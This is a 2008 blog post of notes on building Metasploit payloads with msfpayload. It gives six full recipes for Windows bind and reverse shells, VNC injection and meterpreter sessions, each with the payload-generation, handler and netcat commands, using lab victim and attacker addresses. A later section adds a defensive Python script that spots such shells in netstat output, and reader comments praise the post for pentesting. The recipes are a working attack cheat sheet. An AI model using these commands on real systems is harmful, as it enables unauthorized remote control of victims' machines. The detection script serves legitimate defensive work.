Friday, October 17, 2008

Metasploit Payloads - msfpayload

This entry is really just a place for me to keep notes on working msfpayload details. I will expand on this post as I get more working examples.

These payloads will be detected by AV; I will cover methods of avoiding AV detection in another post.

In my examples 192.168.1.110 is the victim, and 192.168.1.112 is the attacker. Where I have not specified the port it will default to 4444.


1. For a listening shell on the target

Create payload:
./msfpayload windows/shell_bind_tcp LPORT=2482 X > /tmp/Listen-shell.exe

Target:
run Listen-shell.exe

Hacker:
nc 192.168.1.110 2482



2. For a reverse shell on the target

Create payload:
./msfpayload windows/shell/reverse_tcp LHOST=192.168.1.112 X > /tmp/reverse-shell.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/shell/reverse_tcp LHOST=192.168.1.112 E

Target:
run reverse-shell.exe



3. For a VNC listener on target

Create payload:
./msfpayload windows/vncinject/bind_tcp LPORT=2482 X > Listen-vnc.exe

Target:
run Listen-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/bind_tcp LPORT=2482 RHOST=192.168.1.110 DisableCourtesyShell=TRUE E



4. For a reverse VNC session

Create payload:
./msfpayload windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 X > /tmp/reverse-vnc.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/vncinject/reverse_tcp LHOST=192.168.1.112 LPORT=2482 DisableCourtesyShell=TRUE E

Target:
run reverse-vnc.exe



5. For a meterpreter listener

Create payload:
./msfpayload windows/meterpreter/bind_tcp LPORT=2482 X > met-listen.exe

Target:
run met-listen.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/bind_tcp RHOST=192.168.1.110 LPORT=2482 E



6. For a reverse meterpreter connection (not working yet; not sure why)

Create payload:
./msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.112 X > /tmp/met-reverse.exe

Hacker:
./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.112 E

Target:
run met-reverse.exe
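Every variant above leaves one of two network footprints on the target: a bind payload opens a new listening port (2482 in the examples), and a reverse payload makes an outbound connection to the handler's port (4444 when LPORT is not given). The following is an added example, not from the original post, showing how a defender would pick both patterns out of Windows "netstat -an" output. The netstat lines are constructed for the example and reuse the post's addresses and ports; the port list is an assumption that in practice would come from policy or threat intel.

```python
"""Flag bind-shell listeners and reverse-shell callbacks in netstat output.

Added example, not part of the original post. The port set and the sample
netstat lines are constructed; only the address/port values come from the post.
"""
import re
from typing import Dict, List, Tuple

# Ports used by the payloads in the post: Metasploit's default 4444 and the
# explicitly chosen LPORT 2482. Assumption: in a real deployment this comes
# from a watch-list, since an attacker can pick any port.
SUSPECT_PORTS = {4444, 2482}

# Constructed sample in the format of `netstat -an` on Windows.
SAMPLE_NETSTAT = """\
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:2482           0.0.0.0:0              LISTENING
  TCP    192.168.1.110:1044     192.168.1.112:4444     ESTABLISHED
  TCP    192.168.1.110:1051     192.168.1.112:443      ESTABLISHED
  UDP    0.0.0.0:500            *:*
"""

# One connection row: proto, local addr:port, foreign addr:port, optional state.
LINE_RE = re.compile(r"^\s*(TCP|UDP)\s+(\S+):(\d+)\s+(\S+):(\S+)\s*(\S+)?\s*$")


def parse_netstat(text: str) -> List[Dict]:
    """Parse netstat -an lines into dicts; headers and unparsable lines are skipped."""
    rows = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        proto, laddr, lport, faddr, fport, state = m.groups()
        rows.append({
            "proto": proto,
            "local_addr": laddr,
            "local_port": int(lport),
            "foreign_addr": faddr,
            # UDP sockets show "*:*" as the foreign side; keep that as None.
            "foreign_port": int(fport) if fport.isdigit() else None,
            "state": state or "",
        })
    return rows


def find_suspicious(rows: List[Dict]) -> List[Tuple[str, int, str]]:
    """Return (kind, port, peer) for sockets matching the two payload footprints.

    bind-listener:    a TCP socket LISTENING on a watched port (bind_tcp payloads)
    reverse-callback: an ESTABLISHED TCP connection whose remote port is watched
                      (reverse_tcp payloads calling back to the handler)
    """
    findings = []
    for r in rows:
        if r["proto"] != "TCP":
            continue
        if r["state"] == "LISTENING" and r["local_port"] in SUSPECT_PORTS:
            findings.append(("bind-listener", r["local_port"], r["local_addr"]))
        elif r["state"] == "ESTABLISHED" and r["foreign_port"] in SUSPECT_PORTS:
            findings.append(("reverse-callback", r["foreign_port"], r["foreign_addr"]))
    return findings


if __name__ == "__main__":
    for kind, port, peer in find_suspicious(parse_netstat(SAMPLE_NETSTAT)):
        print(f"{kind:17} port={port} peer={peer}")
```

Port matching alone is a weak signal, since LPORT is attacker-chosen; the more durable check is to run this against a baseline of expected listeners and outbound destinations for the host (for example with "netstat -ano" so each socket can be tied to its owning process) and alert on anything new, with the known Metasploit defaults as an extra high-confidence rule on top.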


This post was inspired by pauldotcom.

6 comments:

CG said...

you need to specify a port for #6

SynJunkie said...

cheers Chris. I'll give that a go.

overclucker said...

Well, I bet he wanted port 4444, else he would have done differently. Thank you synjunkie! Your work shows important msf functionality not covered in the documentation. Perhaps you would consider making contributions to the msf documentation. Often times, I come across this belief that, if you cannot figure it out for yourself, you don't deserve to figure it out at all. I say: man ain't all there. . . that is, the manual doesn't always enlighten thee to the full functionality of a program or tool set. Forgive my Bourbon influenced ramblings . . .

SynJunkie said...

Hi, thanks for the comment Overclucker.

I keep meaning to update this MSF post but I didn't think it was useful to anyone but me.

Have you checked out Chris Gates' site (Carnal0wnage)? He has loads of MSF stuff that makes mine look pitiful.

Keep drunk posting man!!!

Anonymous said...

Hey,
I'm a dude in Sweden, experimenting with BT3 on my EEE. Thx for posting this stuff, it helped me with pentesting a Win2000 laptop. Couldn't find any premade windows binary (.exe) file in BT3 that I could upload with meterpreter to start a VNC-server. Used your way and it worked like a charm. Nice blog too =)

SynJunkie said...

No probs, really glad you found this stuff useful.

Cheers

Syn